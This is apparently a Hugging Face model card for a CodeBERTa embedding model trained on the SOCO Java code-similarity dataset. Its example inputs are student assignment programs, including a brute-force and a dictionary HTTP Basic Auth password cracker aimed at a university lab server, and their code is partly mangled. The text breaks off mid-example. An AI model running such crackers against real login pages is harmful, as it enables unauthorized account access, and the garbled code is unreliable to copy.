Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper • 1908.10084 • Published • 13
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
'\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n String userPassword = ":"+pwd;\n RealThread myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n th.start();\n try\n {\n \n \n th.sleep(100);\n }\n catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty ("Authorization", " " + encoding);\n System.out.println("Reponse = "+uc.getResponseCode()+"for pwd = "+userPassword);\n this.responseCode = uc.getResponseCode();\n \n if(uc.getResponseCode()==200)\n {\n System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println("Could not execute Thread "+num+" 
");\n }\n }\n\n}\n',
'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new 
InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
'\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr = t.exec("md5sum csfirst.html");\n\n InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n BufferedReader bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\t\t index = s.indexOf(\' \');\n\t\t Fmd5 = s.substring(0,index);\n\t\t System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("md5sum index.html");\n\t\t \n\n\t\t InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\t\t index = temp1.indexOf(\' \');\n\t\t Smd5 = temp1.substring(0,index);\n\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5 == Smd5)\n\t\t System.out.println(" changes Detected");\n\t\t else\n\t\t {\n\t\t pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(" Message.txt | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
import java.io.; |
0 |
import java.util.; |
"+ hash2); BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt")); String line=" " ; String line1=" " ; String line2=" "; String line3=" "; String[] cad = new String[10]; executes("./.sh"); int i=0; while ((line = buf.readLine()) != null) { line1="http://www.cs.rmit.edu./students/images"+line; if (i==1) line2="http://www.cs.rmi... |
0 |
|
|
Loss: SoftmaxLoss

Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.; |
|
0 |
|
|
Loss: SoftmaxLoss

Non-default hyperparameters:

- eval_strategy: steps
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- learning_rate: 2e-05
- num_train_epochs: 1
- warmup_ratio: 0.1
- fp16: True

All hyperparameters:

- overwrite_output_dir: False
- do_predict: False
- eval_strategy: steps
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 2e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.1
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: True
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional

Training logs:

| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.2015 | 0.0240 |
| 0.1064 | 200 | 0.0143 | 0.0209 |
| 0.1596 | 300 | 0.0241 | 0.0241 |
| 0.2128 | 400 | 0.0174 | 0.0213 |
| 0.2660 | 500 | 0.0228 | 0.0206 |
| 0.3191 | 600 | 0.0061 | 0.0226 |
| 0.3723 | 700 | 0.0194 | 0.0208 |
| 0.4255 | 800 | 0.0193 | 0.0197 |
| 0.4787 | 900 | 0.0261 | 0.0175 |
| 0.5319 | 1000 | 0.0189 | 0.0178 |
| 0.5851 | 1100 | 0.0089 | 0.0188 |
| 0.6383 | 1200 | 0.0174 | 0.0161 |
| 0.6915 | 1300 | 0.0171 | 0.0162 |
| 0.7447 | 1400 | 0.0149 | 0.0155 |
| 0.7979 | 1500 | 0.011 | 0.0164 |
| 0.8511 | 1600 | 0.0308 | 0.0160 |
| 0.9043 | 1700 | 0.0048 | 0.0167 |
| 0.9574 | 1800 | 0.0142 | 0.0164 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1
from sentence_transformers import SentenceTransformer model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss") sentences = [ " \n\n\n\n\nimport java.util.*;\nimport java.io.*;\n\npublic class MyTimer\n{\t\n\n\tpublic static void main(String args[])\n\t{\n\t\tWatchdog watch = new Watchdog();\n\t\tTimer time = new Timer();\n\t\ttime.schedule(watch,864000000,864000000);\n\t\t\n\t\t\t\n\t}\n}\n", "\n\npublic class Base64 {\n\n\nstatic public char[] encode(byte[] data)\n{\n char[] out = new char[((data.length + 2) / 3) * 4];\n\n \n \n \n \n for (int i=0, index=0; i<data.length; i+=3, index+=4) {\n boolean quad = false;\n boolean trip = false;\n\n int bat = (0xFF & (int) data[i]);\n bat <<= 8;\n if ((i+1) < data.length) {\n bat |= (0xFF & (int) data[i+1]);\n trip = true;\n }\n bat <<= 8;\n if ((i+2) < data.length) {\n bat |= (0xFF & (int) data[i+2]);\n quad = true;\n }\n out[index+3] = alphabet[(quad? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+2] = alphabet[(trip? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+1] = alphabet[bat & 0x3F];\n bat >>= 6;\n out[index+0] = alphabet[ bat & 0x3F];\n }\n return out;\n}\n\n \nstatic public byte[] decode(char[] data)\n{\n \n \n \n \n \n \n\n int tempLen = data.length;\n for( int ix=0; ix<data.length; ix++ )\n {\n if( (data[ix] > 255) || codes[ data[ix] ] < 0 )\n --tempLen; \n }\n \n \n \n \n\n int len = (tempLen / 4) * 3;\n if ((tempLen % 4) == 3) len += 2;\n if ((tempLen % 4) == 2) len += 1;\n\n byte[] out = new byte[len];\n\n\n\n int shift = 0; \n int accum = 0; \n int index = 0;\n\n \n for (int ix=0; ix<data.length; ix++)\n {\n int value = (data[ix]>255)? 
-1: codes[ data[ix] ];\n\n if ( value >= 0 ) \n {\n accum <<= 6; \n shift += 6; \n accum |= value; \n if ( shift >= 8 ) \n {\n shift -= 8; \n out[index++] = \n (byte) ((accum >> shift) & 0xff);\n }\n }\n \n \n \n \n \n \n }\n\n \n if( index != out.length)\n {\n throw new Error(\"Miscalculated data length (wrote \" + index + \" instead of \" + out.length + \")\");\n }\n\n return out;\n}\n\n\n\n\n\nstatic private char[] alphabet =\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\n .toCharArray();\n\n\n\n\nstatic private byte[] codes = new byte[256];\nstatic {\n for (int i=0; i<256; i++) codes[i] = -1;\n for (int i = 'A'; i <= 'Z'; i++) codes[i] = (byte)( i - 'A');\n for (int i = 'a'; i <= 'z'; i++) codes[i] = (byte)(26 + i - 'a');\n for (int i = '0'; i <= '9'; i++) codes[i] = (byte)(52 + i - '0');\n codes['+'] = 62;\n codes['/'] = 63;\n}\n}", "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\nimport javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper() {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\treturn testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps() throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n", "\n\nimport java.util.*;\nimport java.*;\nimport java.awt.*;\nimport java.net.*;\nimport java.io.*;\nimport java.text.*;\n\npublic class Dictionary {\n \n \n \n public static String Base64Encode(String s) {\n byte[] bb = 
s.getBytes();\n byte[] b = bb;\n char[] table = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\n 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\n '0','1','2','3','4','5','6','7','8','9','+','/' };\n if (bb.length % 3!=0) {\n int x1 = bb.length;\n \n b = new byte[(x1/3+1)*3];\n int x2 = b.length;\n \n for(int i=0;i<x1;i++)\n b[i] = bb[i];\n for(int i=x1;i<x2;i++)\n b[i] = 0;\n }\n \n char[] c = new char[b.length/3*4];\n \n int i=0, j=0;\n while (i+3<=b.length) {\n c[j] = table[(b[i] >> 2)];\n c[j+1] = table[(b[i+1] >> 4) | ((b[i] & 3) << 4)];\n c[j+2] = table[(b[i+2] >> 6) | ((b[i+1] & 15) << 2)];\n c[j+3] = table[(b[i+2] & 63)];\n i+=3;\n j+=4;\n }\n \n j = c.length-1;\n while (c[j]=='A') {\n c[j]='=';\n j--;\n }\n \n return String.valueOf(c);\n }\n \n \n public synchronized void getAccumulatedLocalAttempt() {\n attempt = 0;\n for (int i=0;i<MAXTHREAD;i++) {\n attempt += threads[i].getLocalAttempt();\n }\n }\n \n \n public synchronized void printStatusReport(String Attempt, String currprogress,String ovrl, double[] attmArr, int idx) {\n DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n System.out.println();\n System.out.println(\" ------------------------ [ CURRENT STATISTICS ] ---------------------------\");\n System.out.println();\n System.out.println(\" Current connections : \"+curconn);\n System.out.println(\" Current progress : \"+attempt+ \" of \"+ALLCOMBI+\" (\"+currprogress+\"%)\");\n System.out.println(\" Overall Attempts rate : \"+ovrl+\" attempts second (approx.)\");\n System.out.println();\n System.out.println(\" ---------------------------------------------------------------------------\");\n System.out.println();\n }\n \n \n public class MyTT extends TimerTask {\n \n public synchronized void run() {\n \n \n if (count==REPORT_INTERVAL) {\n \n DecimalFormat fmt = new DecimalFormat();\n 
fmt.applyPattern(\"0.00\");\n \n \n getAccumulatedLocalAttempt();\n double p = (double)attempt/(double)ALLCOMBI*100;\n \n \n double aps = (double) (attempt - attm) / REPORT_INTERVAL;\n \n \n attmArr[attmArrIdx++] = aps;\n \n \n printStatusReport(String.valueOf(attempt),fmt.format(p),fmt.format(getOverallAttemptPerSec()),attmArr,attmArrIdx);\n count = 0;\n } else\n \n if (count==0) {\n getAccumulatedLocalAttempt();\n attm = attempt;\n count++;\n } else {\n count++;\n }\n }\n \n \n \n public synchronized double getOverallAttemptPerSec() {\n double val = 0;\n \n if (attmArrIdx==0) {\n return attmArrIdx;\n } else {\n for (int i=0;i<attmArrIdx;i++) {\n val+= attmArr[i];\n }\n return val / attmArrIdx;\n }\n }\n \n private int count = 0;\n private int attm;\n private int attmArrIdx = 0;\n private double[] attmArr = new double[2*60*60/10]; \n }\n \n \n public synchronized void interruptAll(int ID) {\n for (int i=0;i<MAXTHREAD;i++) {\n if ((threads[i].isAlive()) && (i!=ID)) {\n threads[i].interrupt();\n }\n notifyAll();\n }\n }\n \n \n \n public synchronized void setSuccess(int ID, String p) {\n passw = p;\n success = ID;\n notifyAll();\n interruptAll(ID);\n \n \n end = System.currentTimeMillis();\n }\n \n \n public synchronized boolean isSuccess() {\n return (success>=0);\n }\n \n \n \n public synchronized void waitUntilAllTerminated() {\n while (curconn>0) {\n try {\n wait();\n } catch (InterruptedException e) {}\n }\n }\n \n \n \n \n public synchronized int waitUntilOK2Connect() {\n boolean interruptd= false;\n int idx = -1;\n \n \n \n \n while (curconn>=MAXCONN) {\n try {\n wait();\n } catch (InterruptedException e) { interruptd = true; }\n }\n \n \n \n if (!interruptd) {\n \n curconn++;\n for (idx=0;idx<MAXCONN;idx++)\n if (!connused[idx]) {\n connused[idx] = true;\n break;\n }\n \n notifyAll();\n }\n \n \n return idx;\n }\n \n \n public synchronized void decreaseConn(int idx) {\n curconn--;\n connused[idx] = false;\n \n \n notifyAll();\n }\n \n \n \n \n public 
String[] fetchWords( int idx,int n) {\n String[] result = new String[n];\n try {\n \n BufferedReader b = new BufferedReader(new FileReader(TEMPDICT));\n \n for (int i=0;i<idx;i++) { b.readLine(); }\n \n for (int i=0;i<n;i++) {\n result[i] = b.readLine();\n }\n \n b.print();\n } catch (FileNotFoundException e) {\n System.out.println(e);\n System.exit(0);\n } catch (IOException e) {}\n return result;\n }\n \n \n public String fetchWord( int idx) {\n String result = null;\n try {\n \n BufferedReader b = new BufferedReader(new FileReader(TEMPDICT));\n \n for (int i=0;i<idx;i++) { b.readLine(); }\n \n result = b.readLine();\n \n b.print();\n } catch (FileNotFoundException e) {\n System.out.println(e);\n System.exit(0);\n } catch (IOException e) {}\n return result;\n }\n \n \n public static void readThroughDictionary() {\n try {\n \n BufferedReader b = new BufferedReader(new FileReader(DICTIONARY));\n PrintWriter w = new PrintWriter(new BufferedWriter(new FileWriter(TEMPDICT)));\n String s;\n \n ALLCOMBI = 0;\n while ((s=b.readLine())!=null) {\n if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR)) {\n w.println(s);\n ALLCOMBI++;\n }\n }\n b.print();\n w.print();\n } catch (FileNotFoundException e) {\n System.out.println(\"Unable open the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n } catch (IOException e) {\n System.out.println(\"Error in the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n }\n }\n \n \n \n \n \n public class ThCrack extends Thread {\n \n \n public ThCrack(int threadID, int startidx, int endidx) {\n super(\" Thread #\"+String.valueOf(threadID)+\": \");\n this.ID = threadID;\n this.startidx = startidx;\n this.endidx = endidx;\n \n \n if (endidx>=startidx+MAXCACHE-1) {\n this.localDict = new String[MAXCACHE];\n this.localDict = fetchWords(startidx,MAXCACHE);\n lastFetchIdx = startidx+MAXCACHE-1;\n } else {\n this.localDict = new String[(int)(endidx-startidx+1)];\n this.localDict = fetchWords(startidx,(int)(endidx-startidx+1));\n 
lastFetchIdx = endidx;\n }\n \n setDaemon(true);\n }\n \n \n public boolean launchRequest(String ID, int connID,String thePass) throws IOException, InterruptedException {\n int i;\n String msg;\n \n \n URL tryURL = new URL(THEURL);\n \n \n connections[connID]=(HttpURLConnection) tryURL.openConnection();\n \n \n connections[connID].setRequestProperty(\"Authorization\",\" \"+Base64Encode(USERNAME+\":\"+thePass));\n \n \n i = connections[connID].getResponseCode();\n msg = connections[connID].getResponseMessage();\n connections[connID].disconnect();\n \n \n if (i==HttpURLConnection.HTTP_OK) {\n \n System.out.println(ID+\"Trying '\"+thePass+\"' GOTCHA !!! (= \"+String.valueOf()+\"-\"+msg+\").\");\n setSuccess(this.ID,thePass);\n return (true);\n } else {\n \n System.out.println(ID+\"Trying '\"+thePass+\"' FAILED (= \"+String.valueOf()+\"-\"+msg+\").\");\n return (false);\n }\n }\n \n \n public void rest(int msec) {\n try { sleep(msec); } catch (InterruptedException e) {}\n }\n \n \n public String getCacheIdx(int idx) {\n if (idx<=lastFetchIdx) {\n return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n } else {\n if (lastFetchIdx+localDict.length-1>endidx) {\n this.localDict = fetchWords(lastFetchIdx+1,(int)(endidx-lastFetchIdx-1));\n lastFetchIdx = endidx;\n } else {\n this.localDict = fetchWords(lastFetchIdx+1,localDict.length);\n lastFetchIdx = lastFetchIdx+localDict.length;\n }\n return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n }\n }\n \n \n \n public String constructPassword(int idx) {\n return getCacheIdx(idx);\n }\n \n \n public String getStartStr() {\n return fetchWord(this.startidx);\n }\n \n \n public String getEndStr() {\n return fetchWord(this.endidx);\n }\n \n \n public void run() {\n i = startidx;\n boolean keeprunning = true;\n while ((!isSuccess()) && (i<=endidx) && (keeprunning)) {\n \n \n int idx = waitUntilOK2Connect();\n \n \n if (idx==-1) {\n \n break;\n }\n \n try {\n \n String s = constructPassword(i);\n \n if 
((s.length()>=MINCHAR) && (s.length()<=MAXCHAR))\n launchRequest(getName(), idx, s);\n else\n System.out.println(getName()+\"skipping '\"+s+\"'\");\n \n decreaseConn(idx);\n \n localattempt++;\n \n \n rest(MAXCONN);\n i++;\n } catch (InterruptedException e) {\n \n \n keeprunning = false;\n break;\n } catch (IOException e) {\n \n \n \n \n \n decreaseConn(idx);\n }\n }\n \n \n if (success==this.ID) {\n waitUntilAllTerminated();\n }\n }\n \n \n public int getLocalAttempt() {\n return localattempt;\n }\n \n private int startidx,endidx;\n private int ID;\n private int localattempt = 0;\n private String localDict[]; \n private int lastFetchIdx;\n }\n \n \n public void printProgramHeader(String mode,int nThread) {\n System.out.println();\n System.out.println(\" ********************** [ DICTIONARY CRACKING SYSTEM ] *********************\");\n System.out.println();\n System.out.println(\" URL : \"+THEURL);\n System.out.println(\" Crack Mode : \"+mode);\n System.out.println(\" . Char : \"+MINCHAR);\n System.out.println(\" . Char : \"+MAXCHAR);\n System.out.println(\" # of Thread : \"+nThread);\n System.out.println(\" Connections : \"+MAXCONN);\n System.out.println(\" All Combi. 
: \"+ALLCOMBI);\n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n }\n \n \n public void startNaiveCracking() {\n MAXTHREAD = 1;\n MAXCONN = 1;\n startDistCracking();\n }\n \n \n public void startDistCracking() {\n int startidx,endidx;\n int thcount;\n \n \n if (isenhanced) {\n printProgramHeader(\"ENHANCED DICTIONARY CRACKING ALGORITHM\",MAXTHREAD);\n } else {\n printProgramHeader(\"NAIVE DICTIONARY CRACKING ALGORITHM\",MAXTHREAD);\n }\n \n \n \n \n \n \n \n \n if (MAXTHREAD>ALLCOMBI) { MAXTHREAD = (int) (ALLCOMBI); }\n mult = (ALLCOMBI) / MAXTHREAD;\n \n \n i = System.currentTimeMillis();\n \n \n for (thcount=0;thcount<MAXTHREAD-1;thcount++) {\n startidx = thcount*mult;\n endidx = (thcount+1)*mult-1;\n threads[thcount] = new ThCrack(thcount, startidx, endidx);\n System.out.println(threads[thcount].getName()+\" try crack from '\"+threads[thcount].getStartStr()+\"' '\"+threads[thcount].getEndStr()+\"'\");\n }\n \n \n \n \n \n startidx = (MAXTHREAD-1)*mult;\n endidx = ALLCOMBI-1;\n threads[MAXTHREAD-1] = new ThCrack(MAXTHREAD-1, startidx, endidx);\n System.out.println(threads[MAXTHREAD-1].getName()+\" try crack from '\"+threads[MAXTHREAD-1].getStartStr()+\"' '\"+threads[MAXTHREAD-1].getEndStr()+\"'\");\n \n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n \n \n for (int i=0;i<MAXTHREAD;i++)\n threads[i].print();\n }\n \n \n public Dictionary() {\n \n if (isenhanced) {\n startDistCracking();\n } else {\n startNaiveCracking();\n }\n \n \n reportTimer = new java.util.Timer();\n MyTT tt = new MyTT();\n reportTimer.schedule(tt,0,1000);\n \n \n while ((success==-1) && (attempt<ALLCOMBI)) {\n try { Thread.sleep(100); getAccumulatedLocalAttempt(); } catch (InterruptedException e) { }\n }\n \n \n if (success==-1) {\n end = System.currentTimeMillis();\n }\n \n \n 
getAccumulatedLocalAttempt();\n \n double ovAps = tt.getOverallAttemptPerSec();\n DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n \n reportTimer.cancel();\n \n \n try { Thread.sleep(1000); } catch (InterruptedException e) { }\n \n \n synchronized (this) {\n if (success>=0) {\n System.out.println();\n System.out.println(\" ********************* [ URL SUCCESSFULLY CRACKED !! ] *********************\");\n System.out.println();\n System.out.println(\" The password is : \"+passw);\n System.out.println(\" Number of attempts : \"+attempt+\" of \"+ALLCOMBI+\" total combinations\");\n System.out.println(\" Attempt position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"%\");\n System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+ \" attempts/sec\");\n System.out.println(\" Cracking time : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n System.out.println(\" Worstcase time estd : \"+fmt.format(1/ovAps*ALLCOMBI)+ \" seconds\");\n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n } else {\n System.out.println();\n System.out.println(\" ********************* [ UNABLE CRACK THE URL !!! 
